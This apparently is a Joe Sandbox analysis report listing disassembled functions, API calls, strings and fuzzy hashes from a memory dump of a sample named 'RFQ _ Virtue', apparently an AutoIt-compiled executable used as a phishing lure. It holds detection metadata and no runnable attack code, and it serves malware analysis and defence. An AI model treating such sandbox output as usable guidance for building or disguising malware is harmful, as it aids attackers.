Opcode ID: a30ab07c5252c5b4c83c7dcf6a3672c108a1506ca5028a9a527dda2282f946dc
Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
Opcode Fuzzy Hash: a30ab07c5252c5b4c83c7dcf6a3672c108a1506ca5028a9a527dda2282f946dc
Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A

Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00402CA2
DeleteObject.GDI32(00000000), ref: 00402CE8
DeleteObject.GDI32(00000000), ref: 00402CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

SendMessageW.USER32(?,00001053), ref: 0043C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912

Strings

0, xrefs: 0043C731

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99

Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
GetClientRect.USER32(00000000,?), ref: 0047763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
GetStockObject.GDI32(00000011), ref: 004776A2
SelectObject.GDI32(00000000,00000000), ref: 004776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
DeleteDC.GDI32(00000000), ref: 004776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
GetStockObject.GDI32(00000011), ref: 004777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB

Strings

static, xrefs: 0047767D, 00477795
msctls_progress32, xrefs: 0047773C
DISPLAY, xrefs: 00477688
AutoIt v3, xrefs: 0047762B

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68

Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59

Strings

\\.\, xrefs: 0046AD70
Virtual, xrefs: 0046AF21
PhysicalDrive, xrefs: 0046ADA7
RAMDisk, xrefs: 0046AE25
iSCSI, xrefs: 0046AEFE
RAID, xrefs: 0046AEF7
ATA, xrefs: 0046AED4
1394, xrefs: 0046AEDB
SATA, xrefs: 0046AF0C
SCSI, xrefs: 0046AEC6
CDROM, xrefs: 0046AE2F
SSD, xrefs: 0046AE86
SSA, xrefs: 0046AEE2
Fibre, xrefs: 0046AEE9
Network, xrefs: 0046AE39
Fixed, xrefs: 0046AE43
USB, xrefs: 0046AEF0
MMC, xrefs: 0046AF1A
SAS, xrefs: 0046AF05
Removable, xrefs: 0046AE4D
FileBackedVirtual, xrefs: 0046AF28
Unknown, xrefs: 0046AE1B, 0046AEBF
ATAPI, xrefs: 0046AECD

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F

Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00406931
__wcsnicmp.LIBCMT ref: 00406949
__wcsnicmp.LIBCMT ref: 00406961
__wcsnicmp.LIBCMT ref: 00406979
__wcsnicmp.LIBCMT ref: 00406991
__wcsnicmp.LIBCMT ref: 004069A9
__wcsnicmp.LIBCMT ref: 004069C1
__wcsnicmp.LIBCMT ref: 004069D5
__wcsnicmp.LIBCMT ref: 00406A16
__wcsnicmp.LIBCMT ref: 00406A2A
__wcsnicmp.LIBCMT ref: 00406A3E
__wcsnicmp.LIBCMT ref: 00406A52

Strings

#pragma compile, xrefs: 0040692B
#notrayicon, xrefs: 00406943
#include-once, xrefs: 0040698B
#OnAutoItStartRegister, xrefs: 00406973
#comments-start, xrefs: 004069BB, 00406A10
#requireadmin, xrefs: 0040695B
#cs, xrefs: 004069CF, 00406A24
Bad directive syntax error, xrefs: 0043E31A
#ce, xrefs: 00406A4C
#include, xrefs: 004069A3
Unterminated group of comments, xrefs: 0043E403
#comments-end, xrefs: 00406A38
Cannot parse #include, xrefs: 0043E3F0

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 01f500350c9121920feb7755ee40dd21149ff6c4001fb330d259501f12758d04
Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
Opcode Fuzzy Hash: 01f500350c9121920feb7755ee40dd21149ff6c4001fb330d259501f12758d04
Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D

Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0048A903
SetTextColor.GDI32(?,?), ref: 0048A907
GetSysColorBrush.USER32(0000000F), ref: 0048A91D
GetSysColor.USER32(0000000F), ref: 0048A928
CreateSolidBrush.GDI32(?), ref: 0048A92D
GetSysColor.USER32(00000011), ref: 0048A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
SelectObject.GDI32(?,00000000), ref: 0048A964
SetBkColor.GDI32(?,00000000), ref: 0048A96D
SelectObject.GDI32(?,?), ref: 0048A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
DrawFocusRect.USER32(?,?), ref: 0048AA3D
GetSysColor.USER32(00000011), ref: 0048AA4B
SetTextColor.GDI32(?,00000000), ref: 0048AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
DeleteObject.GDI32(?), ref: 0048AA89
SelectObject.GDI32(?,?), ref: 0048AA8F
DeleteObject.GDI32(?), ref: 0048AA94
SetTextColor.GDI32(?,?), ref: 0048AA9A
SetBkColor.GDI32(?,?), ref: 0048AAA4

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0d843f32c5cd40bf7db8cb2b67fbd8dc18a2df2c2a6b2ca83797da6c53ab7f18
Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
Opcode Fuzzy Hash: 0d843f32c5cd40bf7db8cb2b67fbd8dc18a2df2c2a6b2ca83797da6c53ab7f18
Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54

Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
CharNextW.USER32(0000014E), ref: 00488B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
_memset.LIBCMT ref: 00488C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
_memset.LIBCMT ref: 00488CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
DrawMenuBar.USER32(?), ref: 00488EC3
SetWindowTextW.USER32(?,0000014E), ref: 00488EEB

Strings

0, xrefs: 00488E55

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 41f0708c9e496ce240b2fcbe6ecd1c851dd44258a91b4427458c4025c321e4c6
Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
Opcode Fuzzy Hash: 41f0708c9e496ce240b2fcbe6ecd1c851dd44258a91b4427458c4025c321e4c6
Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69

Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004849CA
GetDesktopWindow.USER32 ref: 004849DF
GetWindowRect.USER32(00000000), ref: 004849E6
GetWindowLongW.USER32(?,000000F0), ref: 00484A48
DestroyWindow.USER32(?), ref: 00484A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
IsWindowVisible.USER32(?), ref: 00484B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
GetWindowRect.USER32(?,?), ref: 00484B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
CopyRect.USER32(?,?), ref: 00484BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00484C32

Strings

tooltips_class32, xrefs: 00484A96
0, xrefs: 00484975
(, xrefs: 00484BA3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59

Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
_wcscpy.LIBCMT ref: 00464500
_wcscmp.LIBCMT ref: 0046450B
_wcscat.LIBCMT ref: 00464521
_wcsstr.LIBCMT ref: 0046452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
_wcscat.LIBCMT ref: 00464591
_wcscat.LIBCMT ref: 00464598
_wcsncpy.LIBCMT ref: 004645C3

Strings

StringFileInfo\, xrefs: 0046451B
04090000, xrefs: 0046457E
DefaultLangCodepage, xrefs: 004645AB
\VarFileInfo\Translation, xrefs: 00464540
%u.%u.%u.%u, xrefs: 00464626

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f71a8e981e11c88fae17c789c4f28a1016e6d2973b38c9e4e43a4f373b24f533
Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
Opcode Fuzzy Hash: f71a8e981e11c88fae17c789c4f28a1016e6d2973b38c9e4e43a4f373b24f533
Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE

Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
GetSystemMetrics.USER32(00000007), ref: 004028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
GetSystemMetrics.USER32(00000008), ref: 004028F7
GetSystemMetrics.USER32(00000004), ref: 0040291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
GetClientRect.USER32(00000000,000000FF), ref: 004029AE
GetStockObject.GDI32(00000011), ref: 004029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC

Strings

AutoIt v3 GUI, xrefs: 00402974

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
Opcode Fuzzy Hash: 57a12ef2fd1b91479b9d2327a55d351e13c33843b71dd519b67db9d0605663e4
Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58

Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
__swprintf.LIBCMT ref: 0045A51B
_wcscmp.LIBCMT ref: 0045A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
_wcscmp.LIBCMT ref: 0045A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
GetDlgCtrlID.USER32(?), ref: 0045A648
GetWindowRect.USER32(?,?), ref: 0045A67E
GetParent.USER32(?), ref: 0045A69C
ScreenToClient.USER32(00000000), ref: 0045A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
_wcscmp.LIBCMT ref: 0045A731
GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
_wcscmp.LIBCMT ref: 0045A76B

Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634

Strings

%s%u, xrefs: 0045A515

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A

